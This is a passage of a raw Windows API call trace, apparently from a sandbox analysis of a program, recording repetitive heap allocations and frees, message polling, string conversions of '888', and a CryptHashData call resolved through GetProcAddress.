hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0253.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0253.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0253.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0253.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55068 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.910] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0253.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0253.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0253.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0253.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e517c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0253.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.916] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.916] CryptHashData (hHash=0xa87250, pbData=0x2e54fb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0253.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0253.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 